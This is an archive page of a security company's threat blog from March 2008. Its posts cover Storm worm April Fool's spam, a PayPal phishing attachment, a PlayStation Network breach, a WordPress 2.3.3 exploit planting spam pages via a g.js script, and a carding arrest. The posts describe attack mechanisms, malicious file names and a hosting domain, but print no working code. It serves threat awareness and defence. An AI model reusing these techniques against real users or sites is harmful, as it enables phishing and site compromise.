Archive for March, 2008
March 31st, 2008 by Robert McArdle (Threats Analyst)
We’ve spotted a new variant of a well-known threat cashing in on April Fool’s Day in the last few hours. Anyone want to hazard a guess as to what it is?
Wasn’t that hard of a question, I guess. The Storm gang is at it again.
Too lazy to actually create their own image to represent the holiday, the group simply Googled “April Fools” and used the first image that showed up. So far emails are being spammed out with the Subject Line “April Fool’s Day”, and the executables on the site are called foolsday.exe or funny.exe. However if the gang’s past behavior is any indication, these file names will change several times over the next 48 hours to similarly themed names. They’ve already added Kickme.exe in the time it took me to type this.
Needless to say, Trend Micro customers are already being protected using our Web Threat Protection technology — blocking access to the sites themselves, preventing the user from any exposure to the threat. We are also adding detection proactively for the binary files themselves.
Overall I doubt that this incident will be remembered in the same way as other classics such as the value of pi being changed to 3.0 and the hotheaded naked ice borer, but this is definately one prank you do not want to fall for.
Robert McArdle, Senior AntiVirus Specialist
March 31st, 2008 by Macky Cruz (Technical Communications)
For the longest time now, phishers have been spamming targets with email messages that contain links to phishing sites. Last Friday, our Content Security team was able to net a phishing attempt that deviated from this “standard operating procedure.”
Here are a few examples of email messages used by this phishing attack:
Below is a screenshot of the attached HTM file’s contents:
It is a PayPal phish; the text tries to ease user apprehension with phrases such as “fortifying online security,” “safe Web browsers,” and “extra layer of security.” It then entices the user to enter his/her username and password to “learn more about these protection methods.”
Unfortunately, the information keyed in is not used to log on to PayPal or any security-related site; it is instead sent over to a certain URL via a POST transaction. Needless to say, this information can then be used by remote malicious users for their selfish ends.
This specific strain of spam mail is already detected using AS Pattern 5816. Be sure to update scan engines to ensure the fullest protection from today’s threats. Also, avoid opening attachments sent by unknown senders.
March 31st, 2008 by Roderick Ordoñez (Technical Communications)
Sony claims that a possibility of unauthorized access through the PLAYSTATION®Store, a content download service of the PLAYSTATION®Network, may have occurred. This obviously compromises the millions of accounts subscribed to the said network. The full transcript is given here.
However, Sony reassures its customers that only a small percentage of users are affected, and that since PLAYSTATION Network accounts do not display entire credit card numbers, any unauthorized access to a PLAYSTATION Network account is very unlikely to compromise anyone’s credit information.
If you are a Playstation gamer subscribed to this service, it may be time to check your login credentials. “If you can successfully sign in with your pre-set password, your account is not affected by this incident…,” so goes Sony’s statement.
With malware authors also targeting online gaming, where virtual commodities may fetch higher values than their tangible counterparts, this news may come as no surprise. For gamers, online identity is worth its weight in gold, and it would be devastating to see one’s account hacked, and all hard-earned loot stolen, effectively laying all those hours of hard work to waste.
As with any online account, Trend Micro advises caution and compliance to best industry practices. Use strong passwords, change them frequently, and never share them with anyone else. In this regard, a password change is almost mandatory. Nobody wants a real-world “game over.”
March 31st, 2008 by Jovi Umawing (Technical Communications)
Scores of reports flooded the Internet about Wordpress 2.3.3 being hacked and exploited by a certain automated JavaScript (JS) that led users to links to various sites, which also contain the script.
WordPress users and visitors reported to have encountered a phishing attempt (a wily one, too) wherein users were prompted to register to the blog first as a requirement before they could leave a comment. Note though that most of these sites do not require any registration. And such sites with open registration in their WordPress blogs were very much vulnerable as these are purported to be the very target of this exploit.
Once the vulnerability has been exploited, the script then creates the folder named 1 in the users wp-contents folder. This script then populates the created folder with a list of various spammy Web page links that are mostly related to adult sites and gambling sites. The page links were found to contain the JS script, as well.
In this blog post, the author made an analogy on the g.js script file, which was common to all affected pages. The body of the said .JS code contained the following strings:
Figure 1
Upon closer inspection, one can easily make out the Web site address http://www.preservesitecolorado.org. As of this writing, the site looked bare (see Figure 2), unlike the one described in the blog where the site showed a brief overview about the company/organization and contact information. PreserveSiteColorado.Org was purported to be hosted in China (1)(2)(3)(4)(5).
Figure 2
Hackers also flooded affected pages with links pointing to other infected sites in the comments section of the blog, consequently defacing the page itself. Below is a screenshot sample of the said defacement:
Figure 3
I attempted to search for affected pages myself with Google using the search string inurl:wp-content/1/ (see Figure 4). To date, there are now 21,800 pages purportedly affected by the exploit. If using the search string allinurl:wp-content/1 (see Figure 5), there are now 22,500 pages…and possibly rising. Note also that Google does not flag these pages as something that could potentially harm a system. Though that is the case, not clicking on any of them is still the wise course of action.
![Google Index Results for [inurl:wp-content/1/]](http://www.trendmicro.com/vinfo/images/blog/blog_wordpress1.gif)
Figure 4
![Google Index Results for [allinurl:wp-content/1]](http://www.trendmicro.com/vinfo/images/blog/blog_wordpress2.gif)
Figure 5
As of this writing, a fix for this vulnerability has yet to be issued by WordPress. (You may, however, find this and this useful.) As a workaround, users may want to close their registration feature. Also, be wary of third-party plug-ins you install in your blog sites.
March 31st, 2008 by Arman Capili (Technical Communications)
The Washington Post ran a story on a detained Ukrainian politico by the name of Dmitry Ivanovich Golubov. The 24-year-old Golubov, who ran for a public post under the Internet Party of Ukraine, was charged with credit and debit card information theft that has resulted in millions of dollars in losses for several financial institutions over several years.
Golubov was quick to deny his involvement in any cybercrime activities and maintained that he was framed by the FBI. For their part, U.S. Federal investigators claim that Golubov ranks among the big guns of online fraud forum Carderplanet.com. Several individuals have also come forward and confirmed Golubov’s online criminal activities, including his alleged partner-in-crime Roman Vega, a.k.a. BOA.
But if Golubov is to be believed, he is allegedly a victim of identity theft. An online posting of his passport came with a note that says:
“I Dmitry Golubov, leading hacker, I hack banks, but I have nothing to fear because the police with me at the same time, and in order for you to believe me that I am not afraid I show you my passport, as well as my home address and home phone.”
He attests that someone must have gotten his passport and scanned it, citing that it is ridiculous for a cyber criminal to actually announce online that he is one. A raid by federal authorities in his home that led to his arrest failed to show material evidence of his involvement in cybercrime. However, investigators argue that he had sufficient time to destroy all pertinent and incriminating data from his computer hard drive. Golubov’s apartment uses a steel door as an entrance, and agents had to cut a hole on the adjacent wall to get in, giving him the much-needed extra time.
Investigators also found a portable electromagnetic pulse generator, known as Raskat in Russian. They believe Golubov used it to remotely destroy all data on his hard drive before or even during the conduct of the raid. Golubov says otherwise, and holds one of the agents responsible by mistaking the Raskat for a remote car key. The agent had pressed it over and over to try to locate Golubov’s car but, instead, erased his computer hard drive in the process.
Golubov has since been out on bail after spending six months in a Kiev prison. This crybercrime-slash-political drama is clearly far from being a closed book as both parties are adamant in pursuing their cases. Whether Golubov’s criminal activities have a grain of truth or not, this just goes to show how cybercrime is turning more professional and organized nowadays—like something straight out of a Mario Puzo novel.
Previous Posts
